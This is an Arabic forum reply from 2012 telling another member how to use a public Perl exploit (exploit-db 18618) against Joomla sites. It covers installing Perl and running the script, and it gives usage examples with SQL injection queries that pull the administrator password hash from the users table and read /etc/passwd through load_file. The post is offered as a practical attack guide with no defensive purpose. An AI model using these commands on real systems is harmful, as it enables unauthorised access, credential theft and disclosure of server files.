الموضوع: شرح ثغره
عرض مشاركة واحدة
قديم 03-20-2012, 06:13 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
Dr.NaNo
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي رد: شرح ثغره


وعليكم السلام ورحمه الله وبركاته.

هذه هي الثغرة لم تقم بوضع رابطها :

http://www.exploit-db.com/exploits/18618/

اقتباس
#!/usr/bin/perl

كما تلاحظ الثغرة مكتوبة بلغة البيرل تحتاج لمترجم البيرل بجهازك لكي تستطيع إستثمار الثغرة.

لتحميل مترجم البيرل من موقعه الرسمي :

http://www.activestate.com/activeperl/downloads

بعد ذلك تذهب إلى شاشة الدوس وتذهب لمسار الملف وتنفذ الأمر ك

perl 18618.pl

سوف يأتيك الشرح لكيفية التشغيل :

examples:
get admin password:
18618.pl http://host/joomla/ 3 'database()'
18618.pl http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema="joomla" and table_name like "%25_users"'
18618.pl http://host/joomla/ 3 'select password from zzzz_users limit 1'
get file /etc/passwd
18618.pl http://host/joomla/ 3 'load_file("/etc/passwd")'


الثغرة ليست بتلك الخطورة ,
التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس